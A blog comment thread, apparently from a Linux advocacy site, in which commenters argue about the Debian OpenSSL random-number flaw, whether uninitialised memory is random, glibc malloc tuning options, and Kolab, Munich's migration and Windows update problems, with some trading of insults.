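    For those who want junk done properly on GNU/Linux, the portable move is to ask the kernel rather than scavenge RAM; a minimal sketch (error handling kept short):

    #include <stdio.h>

    int main(void) {
        unsigned int seed;
        /* /dev/urandom is the kernel's non-blocking entropy pool */
        FILE *f = fopen("/dev/urandom", "rb");
        if (f == NULL || fread(&seed, sizeof seed, 1, f) != 1) {
            perror("/dev/urandom");
            return 1;
        }
        fclose(f);
        printf("seed: %08x\n", seed);
        return 0;
    }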

  107. oiaohm says:

    That Exploit Guy, run this modified version of your example. Yes, I have reduced the buffer size, but that is for practical reasons: 100 is simpler for a human to compare by eye.
    #include <stdio.h>

    int main(void) {
        int i;
        unsigned int buf[100], result = 0;  /* buf deliberately left uninitialised */
        for (i = 0; i < 100; i++) {
            /* print each "random" element so it can be compared by eye */
            printf("randomlist %i,%x\n", i, buf[i]);
            result ^= buf[i];
        }
        printf("test %x\n", result);
        return 0;
    }

    That Exploit Guy, run this form of the program. This version is a true check of the random data source. Notice how many values of buf[i], without me tweaking anything, are basically constant every time the program is run. Turn off address randomization and the result can show no variation at all. NoMMU routers and printers of course don’t have address randomization: hello, the source of the huge number of matching SSL public keys. By the way, turning off address randomization under Linux is a performance tweak at the cost of security. Yes, due to items like OpenSSL using undefined buffers, the cost is a little higher than it should be.

    The reality is your random number generator is generating from addresses the Linux kernel address randomization created. Little issue: Linux address space randomization will not give you every value either, so your random number source’s entropy is not 32 bits.

    Undefined data is not trustable as random data; undefined can become defined. In fact, a large percentage of the undefined data you are using is defined by the compiler when the program is built. Is it possible that your full 0xfff (4095) range, by compiler optimization, could be just a block of all zeros and be all zeros every time the program runs? Oh yes it is, and this is without me tweaking a single flag. It’s just a case of the compiler going the wrong way when optimizing.

    Undefined is not random. Undefined has a horrible habit of becoming defined, and if you don’t notice, you are in so much trouble it’s not funny.

    That Exploit Guy, you have not checked your random source to see what it is. It is critical to check how much of your random source is truly random.

    Remember, your example is simple. Libraries and applications are a lot more complex. This brings hell. The more complex the code, the more chances the compiler will optimize your undefined array source so it is completely jammed into a defined state.

    That Exploit Guy, only an idiot disobeys the C standard, which tells you that you should never depend on anything undefined working for you. The problem is an idiot who does not follow the C standard’s recommendations got to the head of the OpenSSL project and went ahead and claimed using undefined data is OK. This is something the TMR guys could possibly do some good with. It’s a pure myth that undefined is random. The myth causes a stack of security flaws.

  108. DrLoser says:

    Still, and in muted celebration of our Canadian cousins (amongst so many who gave their lives 100 years ago, and since we are very close to the Last Post of All Last Posts):

    Let us all, on each and every side of the software divide, raise a cup to the fallen.

    Dulce et decorum est…

  109. DrLoser says:

    Whether or not a person has some flaw is not relevant. I want decorum here. It’s neither necessary nor desirable to discuss the flaws of individuals here. Stick to the technology/personal experience/opinion/logic etc.

    In passing, it’s a little too late to ask for decorum when you allow oiaohm to call every single person who disagrees with him (sometimes on unimpeachably factual grounds) an idiot.

    And Dougie and I seem to be able to trade extremely indecorous insults without edits. (I am fairly sure that Dougie will agree with me that this is a Good Thing.)

    I’m intrigued, though. A whole post effectively censored because of an ad hominem attack? That doesn’t sound much like Deaf Spy. Sounds a whole lot more like me, for example … I’m a Brummie, I like to use four letter words (and I’m trying to suppress that for the purposes of writing to this site).

    Surely there was some content to that post that you didn’t need to censor?

    I mean, paranoia works both ways, you know.

    Perhaps that redaction is simply there because you cannot stand the fact that TEG is obviously correct?

  110. dougman quoth, “the hackers were able to jump the barriers between a peripheral third-party vendor system and the company’s more secure main computer network by exploiting a vulnerability in Microsoft Corp. ’s Windows operating system”.

    More likely, as many vulnerabilities as they needed. Malware-writers have books full of exploits of that other OS. Security was bad enough a decade ago with that other OS but for some it takes an incident like this to wake up.

  111. dougman wrote, “rebooting to patch itself, so it can reboot better”.

    Yep, there’s a basic problem with all the complexity bred to lock in users. That complexity doesn’t scale. It’s reached the point where not even M$ can care for its own bloatware.

  112. dougman says:

    I still am laughing at the fact that they are looking to Apple products now…LOL.

    “the hackers were able to jump the barriers between a peripheral third-party vendor system and the company’s more secure main computer network by exploiting a vulnerability in Microsoft Corp. ’s Windows operating system, the people briefed on the investigation said.

    Microsoft issued a patch after the breach began, and Home Depot installed it, but the fix came too late, the people added. Afforded such access, the hackers were able to move throughout Home Depot’s systems and over to the company’s point-of-sale systems as if they were Home Depot employees with high-level permissions, the people said. Microsoft declined to comment.”

    Of course M$ would refuse to comment..LOLz….

    http://hothardware.com/News/Home-Depot-Notes-Windows-Is-To-Blame-For-Massive-Security-Breach/

    http://online.wsj.com/articles/home-depot-hackers-used-password-stolen-from-vendor-1415309282

    http://www.imore.com/home-depot-switches-execs-iphones-macbooks-it-blames-windows-massive-breach

  113. dougman says:

    Oldman sayeth: “The fact that a group of users do not “like” Linux or do not “feel it is necessary” simply doesn’t cut it in terms of the real functional capabilities.”

    I say Amen to that.

  114. dougman says:

    Problems are mounting for MicroSh1t; pushing out questionable updates will be their downfall.

    “Microsoft’s impending obsolescence is caused by its failure to grasp its own increasing irrelevance – a prominent Microsoft MVP and listserv moderator, Susan Bradley, wrote a letter to Steve Ballmer asking him to look into why Microsoft released obviously broken patches and updates as part of this month’s Patch Tuesday. Ordinarily, this would be small potatoes — except it’s the third month in a row that Microsoft has released major security fixes or features, then yanked them within hours or days. The problems at Microsoft run deeper than bad patches — even multiple bad patches in a row. To date, nothing the company has done or said, including getting rid of Ballmer, has spoken to the underlying problem.”

    “All 3 of my own Win2008R2SP1 servers got stuck in a triple auto-reboot Windows Update Failure this morning. All had 16 updates… They did eventually recover after 2 or 3 auto-rollback reboots… Checking updates on them all now shows this one still to install: Security Update for Windows Server 2008 R2 x64 Edition”

    http://www.infoworld.com/article/2834535/security/four-more-botched-black-tuesday-patches-kb-3000061-kb-2984972-kb-2949927-and-kb-2995388.html

    Look at the treasure trove of comments:

    – It took me 45 minutes to make my laptop functional again after the last batch of updates. Windows could not load properly. Apparently they could not all update at once.

    – I had to remove the contents of the registry folder..

    and the best for last,

    – I’m caught in a never-ending loop after installing the latest updates. The computer goes back and forth between a ” Starting Windows” screen and the Dell XPS Studio logo screen. This started around 8 PM last night and is still going strong 15 hours later. Any way to fix this?

    I am guessing this is the M$ functionality of rebooting to patch itself, so it can reboot better. LOLz…

  115. olderman wrote, “A truth that Robert Pogson can’t handle is censored.”

    Whether or not a person has some flaw is not relevant. I want decorum here. It’s neither necessary nor desirable to discuss the flaws of individuals here. Stick to the technology/personal experience/opinion/logic etc.

  116. olderman says:

    “[AD HOMINEM ATTACK REMOVED – rp]”
    Nope.

    A truth that Robert Pogson can’t handle is censored.

  117. dougman wrote, “had to rewrite their graduating thesis over a weekend”.

    That brings back horrible memories. In the pre-PC age, it took me a year to write my thesis and a week on a typewriter for a pro to type it up. Having that other OS eat it would have caused a lot of anguish which was already plentiful. I’ve seen students in tears when that other OS ate their assignments. That inspired me to convert my first lab… Instead of a daily occurrence we went months with no one losing any data.

  118. dougman says:

    The arrogance of M$ MVPs is funny, but sad.

    http://answers.microsoft.com/en-us/windows/forum/windows8_1-windows_update/windows-81-is-malware/c7ff95fe-5cb8-4677-8fa2-41793597a70d

    Some dude is upset that Windows updated AUTOMATICALLY then restarted/rebooted his computer, sans his consent. The MVPs show him some screenshot, but it does not mention restarting/rebooting….LOLz.

    Another thread describing the failure in action…

    “Automatic updates on my girlfriends windows 8 laptop were turned on without her consent, my girlfriend is smart and never just clicks things so I know she didn’t cause this. After a few days and some auto updates (annoying), she walks into class to find her pc mid upgrade to 8.1. How did the pc auto update to 8.1 when its supposed to be optional and ask permission. Since then her pc survived the 8.1 update but now forces updates and reboots. This has already cost her work. We have not been able to turn off updates in the menu. We select “check for updates and let me choose “then click ok. But, after you reboot its back to automatically install updates. We have tried every non- auto install option in the menu to no avail. Auto updates are stuck on. And after it has forced her to 8.1 you can imagine why she wants them off. Also a full re-install is out of the question shes in college and mid semester no chances can be taken. ”

    Believe it or not, I know someone who had to rewrite their graduating thesis over a weekend, as their laptop with “Wind-Dohs” crashed.

    Good thing that the EULA the consumers agreed to forbids class action lawsuits.

  119. Deaf Spy says:

    Get yourself a stock Debian install, tweak it to your heart’s content and then compile and run my program in it.
    [AD HOMINEM ATTACK REMOVED – rp]

  120. That Exploit Guy says:

    Exploit Guy did not set mallopt values, so his code was defective for getting random data in a glibc environment. Also, address randomization is most of the source of the random data Exploit Guy is seeing, yet nowhere in Exploit Guy’s code does he check that address randomization is on. Remember, you can turn address randomization off; again, this is another stock feature that an administrator can change. Yes, the Linux kernel address randomizer depends on the Linux kernel random number generator, which has known bugs in virtual machine images.

    The problem with Exploit Guy’s code is you can cripple it just by changing configuration options. Yes, on a fresh install of a stock Linux distribution, Exploit Guy’s example code appears to work. The problem is an admin can come along and change a few options, and his code then does not work.

    You have already been asked once to prove your assertion through providing the outputs of the programs. Get yourself a stock Debian install, tweak it to your heart’s content and then compile and run my program in it.

    Even up until this point you have given exactly zero pieces of empirical evidence to support any of your claims, and I have already specifically told you not to give me “I know because I am oiaohm” BS, which is exactly what you are giving me right now.

    This is all very typical, isn’t it, that you write all kinds of CS-sounding fiction to impress people, and when someone asks you to prove your BS, you simply pretend no one has asked you anything and instead attempt to cover your BS with even more BS.

    So, what is it now, Peter Dolding? Are you going to prove me wrong with outputs from my own code and settle the record once and for all, or are you just going to crap out another wall of nonsensical text knowing that all you can possibly show me is stuff-all?

    I eagerly await your reply.

  121. DrLoser says:

    Having said which, Robert, it’s only ten swiss francs, as I mentioned below.

    Why don’t you download it and give it a go? Munich will thank you for your FLOSS expertise.

  122. DrLoser says:

    Some of these, he explains, are very large organizations which use Kolab as a competitive advantage they do not wish their competitors to know about.

    Yup, that has the ring of truth about it.

    If I’m running WidgetCo with a typical SME turnover of say $5 to $50 million a year, the very last corporate advantage I want to give away is …

    … my choice of a unified email and calendaring system.

    That would be simply disastrous.

  123. DrLoser says:

    Oh, what a fool I was, Robert.

    Kolab claims many organizations are secretly using Kolab.

    Well, that should be good enough for anybody, shouldn’t it? Good Lord, actual proof is a footling thing in comparison.

    One tiny point. How would anybody keep this sort of thing “secret?” I mean, it’s not like being a secret heroin addict over the weekend. Somebody is bound to notice, aren’t they? Not least, say, your friendly local Linux Sysadmin…

    But you have defeated me. When I airily suggested “absolutely nobody,” I clearly missed 36K users in Basel.

    Let me try again, then.

    “A stupendously tiny little proportion of potential customers, compared to Microsoft Exchange.
    “But, hey, 36K users in the Basel school system! And scores of other secretive types!”

    Not really an auspicious advertisement for the universal applicability of a “combined email and calendaring” system that you, yourself, Robert, dismissed as “something that nobody with a dolly bird and a bull-horn and a nifty fast car would really feel the need for.”

  124. DrLoser wrote, “Nobody cares about the pricing structure of Kolab, because nobody cares about Kolab. To be a viable competitor for Microsoft Exchange, you actually have to persuade people to use your product. It’s far from clear to me that Kolab has done this.”

    Schools in Basel have 36K users

    Kolab claims many organizations are secretly using Kolab.
    “Anyone looking for a well supported solution is a target audience of Kolab Systems. The solution is used by the Schools in the city of Basel, Switzerland, but there are also customers which Greve could not name due to NDAs with the particular customers. Some of these, he explains, are very large organizations which use Kolab as a competitive advantage they do not wish their competitors to know about. Kolab is effectively used by every size of organization – from very small enterprises to bodies as big as regional governments. It’s also used by schools in Switzerland.”

    See Kolab creates a privacy refugee camp in Switzerland

    So, instead of assuming Kolab is not used, one should assume that a business set up to produce and to support Kolab is actually doing some business. Why would anyone not use Kolab who wanted its features?

  125. DrLoser says:

    DrLoser, you are googling incorrectly, attempting to save Exploit Guy’s ass.

    There is no such thing as “googling incorrectly,” oiaohm. There is only an unremitting failure to comprehend the reality of what one has just googled.

    I leave this particular unremitting failure in your provenly capable hands.

    The reality is Exploit Guy cannot code a random number source to save himself.

    Oh, I think you’ll find that modern cryptographers would balk at the description of a three-line program in C as a “random number generator.” Which wasn’t what TEG was providing in the first place: he was disproving your inane assertion that something magical in stock Debian (this being the source of the OpenSSL bug) either zeros or dead-beefs memory for you.

    Which is demonstrably untrue. Demonstrably, with a three line C program. No random number generation required.

  126. DrLoser says:

    Interestingly enough, Kontact Enterprise is sold as Kolab Client Certified at 10 CHF per named user.

    You certainly have a way with words, oiaohm. Things that are not remotely “nasty” are, in your world, “nasty.” And things that are not remotely interesting are a source of unbounded fascination to you.

    Nobody cares about the pricing structure of Kolab, because nobody cares about Kolab. To be a viable competitor for Microsoft Exchange, you actually have to persuade people to use your product. It’s far from clear to me that Kolab has done this.

    Yes, Kolab Client is still technically open source, since when you buy the program you get access to the source code.

    Seems a bit silly, though, doesn’t it? I mean, ten swiss francs and you’re entitled to all the source code you can eat (and there’s a huge bloated pile of it).

    Considering that nobody in their right mind would buy more than a single client license, I can’t even see this paying for clearing the purchase item through EPS.

  127. oiaohm says:

    https://kolabsys.com/products/kolab-enterprise
    https://kolabsys.com/pricing
    Interestingly enough, Kontact Enterprise is sold as Kolab Client Certified at 10 CHF per named user.

    Yes, DrLoser, you cannot get the binaries for Kolab Client Certified without paying. This is the case with FOSS: sometimes you need the binaries. Yes, the Kontact Enterprise binaries from a long time ago are the source of Kolab Client.

    Yes, Kolab Client is still technically open source, since when you buy the program you get access to the source code.

  128. oiaohm says:

    DrLoser, the reason for zeroing out memory on free is to prevent data leakage. The malloc flags in glibc’s mallopt() are in fact controllable by environment variables. So, stock features.

    http://man7.org/linux/man-pages/man3/mallopt.3.html DrLoser, you are googling incorrectly, attempting to save Exploit Guy’s ass. The reality is Exploit Guy cannot code a random number source to save himself.

    So even if you build your code without mallopt enabled, it can be running with the environment variables set. MALLOC_PERTURB_ and MALLOC_TRIM_THRESHOLD_ are the environment variables glibc responds to. These are a stock part of operating in a glibc environment. Yes, stock environment flags controlling glibc.

    So — not just not stock, but also something not called by the software in question.
    Wrong, DrLoser: mallopt behaviour is a stock feature that can be enabled or disabled at the will of the end user, so it does not have to be called by the program. In fact, not calling it in a program, as in Exploit Guy’s case, leaves the settings outside the control of the software developer unless they set mallopt themselves.
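
    A quick way to see the effect; a hypothetical demo, though MALLOC_PERTURB_ itself is the real glibc variable documented in mallopt(3):

    #include <stdio.h>
    #include <stdlib.h>

    int main(void) {
        unsigned char *p = malloc(64);   /* deliberately not initialised */
        if (p == NULL)
            return 1;
        printf("first byte: %02x\n", p[0]);
        free(p);
        return 0;
    }

    Run it plain, then as “MALLOC_PERTURB_=66 ./a.out”; with the variable set, glibc fills the fresh block with a fixed pattern (per mallopt(3), the complement of the value’s low byte), so the “junk” is suddenly well-defined.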

    Exploit Guy did not set mallopt values, so his code was defective for getting random data in a glibc environment. Also, address randomization is most of the source of the random data Exploit Guy is seeing, yet nowhere in Exploit Guy’s code does he check that address randomization is on. Remember, you can turn address randomization off; again, this is another stock feature that an administrator can change. Yes, the Linux kernel address randomizer depends on the Linux kernel random number generator, which has known bugs in virtual machine images.

    The problem with Exploit Guy’s code is you can cripple it just by changing configuration options. Yes, on a fresh install of a stock Linux distribution, Exploit Guy’s example code appears to work. The problem is an admin can come along and change a few options, and his code then does not work.

    The other two are an alteration to ld.so and linker script options. The result is zeroed or deadbeef. ld.so is part of glibc; ld.so alterations are ld.so build flags.
    Remember, I mentioned Gentoo hardened having an issue with OpenSSL randomness; that has an altered compiler, not stock Debian. Exploit Guy changed distribution to cover up his incompetence and then still managed to screw it up completely. Exploit Guy’s code is way too simple. The reality is it is simpler to just call the Linux kernel random number generator directly than to attempt to use undefined data, since there are too many ways for a glibc/Linux-based OS to make undefined data defined. Most of the ways don’t require binaries to be rebuilt, just altering the configuration of the system. Some can be a virtual machine giving the Linux system exactly the same random seed every time it starts up.

    Yes, the Linux kernel random number generator is not fully trustable. Linux memory is not trustable to be random. I will state it again: undefined is not random. Never ever mistake undefined for random, because it does bite.

    A proper random source requires a stack of checks to make sure the system has not been altered in ways that cripple the source. Even in-CPU random number generators have been screwed up by constant EM noise patterns. Proper random is very hard work and never a short, simple bit of code.

  129. DrLoser says:

    Honestly, I am not even going to try and point out how irrelevant and utterly stupid your [oiaohm’s] entire argument is.

    Then again, somebody like me with mild OCD would be happy to assist. TEG’s original challenge:

    Compile it using GCC under any stock version of Debian and any of the CPU architectures listed here.

    And oiaohm’s typically evasive response?

    The other two are an alteration to ld.so and linker script options. The result is zeroed or deadbeef. ld.so is part of glibc; ld.so alterations are ld.so build flags.

    Does this sound like “any stock version of Debian” to you? Because it doesn’t to me.

    I’m all excited by the tuneable parameters to malloc(). No, wait, I’m not. They are totally irrelevant, oiaohm. Quite apart from the fact that, if they were relevant (which they are not), you’d still have to call mallopt() first, wouldn’t you? So — not just not stock, but also something not called by the software in question.

    Generally speaking, and without calling calloc() or the moral equivalent, no commercial programmer of any repute whatsoever (which clearly excludes oiaohm) would rely on a release version of a program using malloc() either to dead-beef the memory or else to zero it out.

    Debug versions of the same programs are, of course, an entirely separate thing.

  130. DrLoser says:

    Repeating that doesn’t make it true. All they have to do is get it installed on a terminal server and, via X, it’s available on all GNU/Linux machines.

    And (ignoring the completely irrelevant bit about terminal servers and thin clients, which does not appear to apply to Munich), asserting a wild claim like this does not make it true, Robert.

    Ab initio, if it were this easy, the Munich IT department would already have done it. They wouldn’t need to wait until some unspecified time in the middle of 2015, would they? Unless they’re slacking off.

    Furthermore, your claim makes the huge assumption that Kontact is fit for purpose in the first place.

    My cursory reading around the thing suggests that it is anything but.

  131. That Exploit Guy says:

    That Exploit Guy, that code of yours does not even pass building with -Wall on, due to a printf error.

    Those are just warnings about the improper use of the format specifier %d. The code will still compile and run properly, and I have no interest in fiddling with crap like format specifiers just to get it absolutely perfect.

    You are mistaken and being tricked by not enough testing and not enough understanding of what the kernel is coded to do and what glibc can be configured to do.

    Then you should have no trouble proving this by showing me outputs from my program.

    Honestly, I am not even going to try and point out how irrelevant and utterly stupid your entire argument is. If even someone like Dougman can’t take you seriously, then quite frankly it’s a waste of time for me to debunk your rubbish.

    By the way, if all that you are after is a bit of adoration in an otherwise sad life for a legally disabled person, why not try something like, I don’t know, eating 23-year-old luncheon meat in front of a camera? This guy did, and apparently that worked out pretty well for him, so why choose instead to confuse people with stuff that has been pulled out of your own backside?

  132. DrLoser wrote, “IT guys have given themselves until some time in 2015 to get their Kontact solution up and working.
    I said it last time and I’ll say it again:
    They don’t have a prayer in hell.”

    Repeating that doesn’t make it true. All they have to do is get it installed on a terminal server and, via X, it’s available on all GNU/Linux machines. I’m sure there’s equivalent functionality for that other OS, say Cygwin/X or xrdp (deleted from Wikipedia, eh?), homepage here. That’s just like Wikipedia, deleting an article on xrdp for lack of “notability” when it is used on millions of terminal servers all over the world. Interestingly, it is noteworthy in German.

  133. dougman says:

    Re: Outlook and Photoshop

    Both have been replaced with alternatives these days.

    SMBs can get by with Google Apps and toss the M$ stack.

    https://www.google.com/work/apps/business/products.html

  134. DrLoser says:

    (Darned spell-checker. Must double check it next time. Kontact in all cases …)

  135. DrLoser says:

    Deaf Spy, you don’t need to buy Windows to get an integrated tool like Outlook. There is an item called Kontact. The issue at Munich is that Kontact for Windows in an easy-to-install form is not free.

    We’ve covered contact very recently, oiaohm. Please stop repeating yourself.

    It doesn’t matter whether or not it is free: it is still supposedly available on Windows. Nothing in the Munich migration path suggests that they will not pay for tools where necessary. In this case they presumably have not.

    The Windows version (as I pointed out, using the Kontact site) is to all intents and purposes defunct. The last known download is a “giant debug” version from November 2009, I seem to recall. It’s clearly not under FLOSS development at the moment.

    In any case, if you read just the installation notes, it was clearly (on Windows) crap.

    The availability of an “integrated tool” does not necessarily invite the “purchase” of said tool, oiaohm. Which is presumably why the Munich IT guys have given themselves until some time in 2015 to get their Kontact solution up and working.

    I said it last time and I’ll say it again:

    They don’t have a prayer in hell.

  136. oiaohm says:

    Deaf Spy, you don’t need to buy Windows to get an integrated tool like Outlook. There is an item called Kontact. The issue at Munich is that Kontact for Windows in an easy-to-install form is not free.

  137. oiaohm says:

    Deaf Spy, of course what I am talking about is malloc-related: the mallopt options M_PERTURB and M_TRIM_THRESHOLD. The other two are an alteration to ld.so and linker script options. The result is zeroed or deadbeef. ld.so is part of glibc; ld.so alterations are ld.so build flags.

    That Exploit Guy, that code of yours does not even pass building with -Wall on, due to a printf error.

    http://stackoverflow.com/questions/6004816/kernel-zeroes-memory Please read and take serious note. Even without using any flags, at times Linux can turn on you and the result from your random code can be completely zero, repeatedly.

    If I am not mistaken, the output should give you a nice little random number.
    You are mistaken and being tricked by not enough testing and not enough understanding of what the kernel is coded to do and what glibc can be configured to do.
    Setting M_TRIM_THRESHOLD to 0 means every time something does a free, glibc tells the kernel it can have the page back. The result: all pages the application gets are new all the time, so they are always zero. M_PERTURB turns malloc into something calloc-like (how 0x100 works: only the least significant byte of the value is used). Note also M_PERTURB does this on free as well. Random data in RAM can become very limited to almost non-existent.
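
    The same knobs can be set from inside a program; a minimal sketch using the real glibc calls:

    #include <malloc.h>   /* mallopt, M_PERTURB, M_TRIM_THRESHOLD */
    #include <stdio.h>
    #include <stdlib.h>

    int main(void) {
        mallopt(M_TRIM_THRESHOLD, 0);  /* return freed pages to the kernel at once */
        mallopt(M_PERTURB, 0x42);      /* fill allocations/frees with a known pattern */
        unsigned char *p = malloc(64);
        if (p == NULL)
            return 1;
        /* Now a deterministic pattern (the complement of 0x42), not leftover junk. */
        printf("first byte: %02x\n", p[0]);
        free(p);
        return 0;
    }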

    By the C standard, undefined is undefined. The problem is undefined is not random. The C standard defines a random function for a reason. If the OS decides to define the undefined for some reason, that’s legal.

    The only reason there is any value in your random data other than zero is that the memory is not a fresh allocation but a recycled pool.
    That Exploit Guy, basically you wrote a “do you feel lucky, punk?” random number generator. If the system is under heavy RAM pressure, you have very good odds that your code will just return zero, as every new page your application requests will be zero.

    Yes, there is coding or using a proper random number source, or there is doing the stupidity you just did, That Exploit Guy.

    Basically, That Exploit Guy, you just coded a random generator that can be predictably nonrandom. Just do a DoS attack or the like to consume a lot of RAM. A correct version of your code would check for zeroed-out memory at a minimum; a better, multi-platform-safe version doesn’t do it that way at all. If the block is completely zeroed out, you have just got a fresh block from the kernel, so no random data.
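
    That minimum check might look like this; a hypothetical sketch, not code from either program above:

    #include <stdio.h>

    /* Returns 1 if every word is zero, i.e. the memory is probably a
       fresh, kernel-zeroed page and useless as "entropy". */
    static int all_zero(const unsigned int *p, int n) {
        int i;
        for (i = 0; i < n; i++)
            if (p[i] != 0)
                return 0;
        return 1;
    }

    int main(void) {
        unsigned int buf[100];           /* deliberately uninitialised */
        if (all_zero(buf, 100))
            fprintf(stderr, "buffer is all zeros: no junk to harvest\n");
        return 0;
    }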

    Also, you have to allow for compilers like Visual Studio’s or IBM’s that can also allocate creative things in debugging modes.

    Worse, remember the values are recycled memory, because kernel-provided new memory is zero. If all the libraries on the system are secure and scrub their memory on free, your random generator will fail again, except now all the time. This was the problem with OpenSSL on hardened systems. The kernel only provides zeros, and if libraries clean up after themselves, all free pages of the application that are being recycled are also all zeros.

    Never mess with the undefined behaviors of C, because one day they will mess with you by doing something defined, just not what you are after.

    That Exploit Guy, thinking it was GCC flags is completely the wrong thing. The two items that bring your foolish idea of a random generator unstuck are the kernel and glibc.

  138. DrLoser says:

    Oh, I think it’s fair to say that the one thing the IT department in Munich doesn’t lack is an “agenda,” DeafSpy.

    It just isn’t terribly well-aligned with the municipality’s governance requirements.

  139. Deaf Spy says:

    What happens when the customers wake up and install FLOSS?
    Discover that there is no alternative to Outlook and Photoshop, and buy a Mac or go back to Windows. Just see how Munich is now crippled without an integrated mail / calendar / agenda tool.

  140. “Get in with a customer, get the trust built, provide the first service and then over time cross-sell and up-sell,” he urged. “That seems to be a model that is resonating very well.”

    Yep. Lock-in in action. What happens when the customers wake up and install FLOSS? M$ is willing to take its channel down with them. OTOH, giving customers FLOSS and helping them migrate could be a growth industry with a much larger future.

  141. That Exploit Guy says:

    That Exploit Guy, only a moron thinks an uninitialized buffer is random. glibc and others have a flag to auto-initialize any uninitialized buffer with 0xdeadbeef or 0x00000000. So, not random.

    Really? Here’s a challenge for you. See this piece of code here? Compile it using GCC under any stock version of Debian and any of the CPU architectures listed here. Go nuts with the optimisation flags – I don’t care. If I am not mistaken, the output should give you a nice little random number.

    Run the compiled program at least five times. Snap a nice picture of the outputs with your mobile phone or whatever – no “I know because I am oiaohm” BS. Prove me wrong.

  142. dougman says:

    “Microsoft has had a shelf-ware problem in the past”…yes, customers are spending money and do not even use 3/4 of the software they purchase.

    Best comment: Sell your customer Office 365 for less than cost. Offer them services and extensions based on that. When the customer complains, they can now never leave as they are locked-in to open standards hating Office 365 and your closed source extensions! You can now ramp prices as you see fit and there’s nothing the customer can do about it.

    http://www.channelregister.co.uk/2014/11/05/microsoft_tells_resellers_to_use_office_365_as_loss_leader/

  143. dougman says:

    Surface devices are not selling well, so let’s try the reseller approach.

    http://www.theregister.co.uk/2014/11/05/microsoft_testing_indirect_sales_for_surface_pro_3/

    Let’s be real: the only real sales of Surface devices have been with M$ paying CNN and the NFL to visually promote the devices…LOL..

    http://hothardware.com/News/CNN-Anchors-Caught-On-Camera-Using-Microsoft-Surface-As-An-iPad-Stand/

    http://www.businessinsider.com/nfl-announcers-surface-tablets-2014-10

  144. Deaf Spy says:

    glibc and others have a flag to auto-initialize any uninitialized buffer with 0xdeadbeef or 0x00000000.
    Ohio, can you prove this with a reference, please? I am eager to learn how a library can auto-initialize a buffer without calling a memory-allocation / initialization function. Here is the source code of glibc’s malloc: ftp://g.oswego.edu/pub/misc/malloc.c

    Feel free to show us where exactly glibc “auto-initializes any uninitialized buffer”.

  145. oiaohm says:

    To put it simply, the vulnerability was caused by some moron removing a reference to the uninitialised buffer buf following what Valgrind and Purify told him. This caused the PRNG to lose all of the entropy buf was meant to provide.

    That Exploit Guy, only a moron thinks an uninitialized buffer is random. glibc and others have a flag to auto-initialize any uninitialized buffer with 0xdeadbeef or 0x00000000. So, not random. This is why the OpenSSL PRNG-related bug was found on Gentoo hardened even though the Debian alteration was not in the source code of Gentoo hardened. This came out later. What OpenSSL was using was presumed to be random when at times it was not going to be.

    The reality here is Valgrind is throwing an uninitialized-buffer warning; the result is the compiler or libc flags can rip your code to bits if you use an uninitialized buffer for anything. Hardware can also rip you to bits. The MMU can be dropping pages that are not actively assigned. Yes, the fun of unallocated memory: it may always be zero. A hardware error, such as lack of RAM, can cause unused pages to be merged into nulls. Hello: without initializing the buffer, what says it is pointing somewhere that is not zeroed?

    Damaged hardware in the form of defective RAM is detected by ECC checking. The result is Linux zones out the damaged memory, so the system is now running short of RAM. Linux running under RAM pressure is more likely to nuke unallocated space, causing unallocated buffer accesses to no longer be random but zeroed.

    Yes, OpenSSL had people raising the issue back in 2003 that the use of unallocated memory was questionable, and the lead developer of OpenSSL said it was fine.

    http://stackoverflow.com/questions/19706319/how-to-zero-unused-memory-to-reduce-vm-snapshot-size
    There are a lot of operational events in Linux that can result in memory blocks being filled with zeros.

    A lot of issues in OpenSSL were blamed on the distribution maintainers for altering stuff. Valgrind and Purify showed errors that should not have been happening in the first place. The developers of OpenSSL thought they knew better than the developers of Valgrind and Purify. The sad reality is Valgrind does not produce false positives when it comes to this kind of bug; Valgrind will only false-negative with unallocated memory.

    DrLoser, for particular items generating SSL material on the fly, the consistency of sysvinit starting things with the same PID numbers is also a problem (yes, another advantage of systemd’s chaos in startup is that PIDs are somewhat random). There are some cases, due to OpenSSL using the current process ID, where the number is static. So yep, in some areas OpenSSL was not random at all. Worse, due to memory pressure events, this was triggerable on systems without the Debian patch. The 2008 fault was quite major.

    The current process ID is not always a random value. DrLoser, you talk about entropy; the problem here is that the OpenSSL random number generator had an entropy of 1 under the right conditions, with nothing to prevent those conditions from happening and nothing to detect that they had happened. Please note: an entropy of 1 without the Debian maintainer’s modification, because the process ID is not always random and the entropy pool may be non-existent, so zeroed. Guess what: a non-existent entropy pool was not detected by OpenSSL back then.

    Rough and haphazard memory management was well and truly known of OpenSSL in 2007.

    Yes, the 2008 Debian OpenSSL PRNG flaw is very serious. People like That Exploit Guy try to make out that the fault was only because of the Debian maintainer’s alteration, missing completely that the OpenSSL random generator was broken with or without the modification. Valgrind, warning about uninitialized data, was in fact showing the error: OpenSSL was not checking that it had a valid entropy pool.

    Bruce Schneier is not a security auditor. Security reporters are a weaker species.

    http://arstechnica.com/business/news/2012/02/crypto-shocker-four-of-every-1000-public-keys-provide-no-security.ars
    Entropy is a huge problem for SSL. OpenSSL is not the only SSL implementation found to miss validation of produced keys and the entropy pool. Yes, in 2012 someone decided they had better do a survey of keys to double-check on entropy, and found that the 2008 error was only a small part of the problem. There is something wrong with the entropy being used to generate SSL keys from many sources.

    Validation of produced keys is harder because you need to validate against keys already in existence. Conflicts ruin keys.

  146. DrLoser wrote, “the amateur morons who deploy it.”

    The software is usually deployed by an OEM, some IT-guy, or the end user. They are not all morons. FLOSS is a meritocracy. Prove yourself more capable, release software, and your software will be used instead of that other software.

  147. DrLoser says:

    (Correction: 16 bits of entropy in theory, not 10.
    (Of course, you’d have to run your “always on” Linux system pretty heavily to get past 2^10 process ids, so I’m OK with my original statement in general.)

  148. DrLoser says:

    To put it simply, the vulnerability was caused by some moron removing a reference to the uninitialised buffer buf following what Valgrind and Purify told him. This caused the PRNG to lose all of the entropy buf was meant to provide.

    No, wait, TEG, “real world possible hardware error” can also have that effect.

    Bwahahaha!

  149. DrLoser says:

    OpenSSL was lacking a test suite and also never tested the random number generator before accepting it.

    The Debian SSL random number bug, oiaohm, had a mere ten bits of entropy, what with the asinine decision to base the Gaussian field upon Linux PIDs.

    Me, I’d call this a horrible and pathetic failure of implementation.

    But yes, you’re right, somebody should have tested it, possibly — actually, almost imperatively — via a test suite. Maybe Debian. Maybe Red Hat. Ooh, who knows, let’s roll the dice: maybe some organisation responsible for the Secure Socket Library?

    I don’t actually care how pissed off the original implementer is about this.

    I’m pissed off.

    TEG is pissed off.

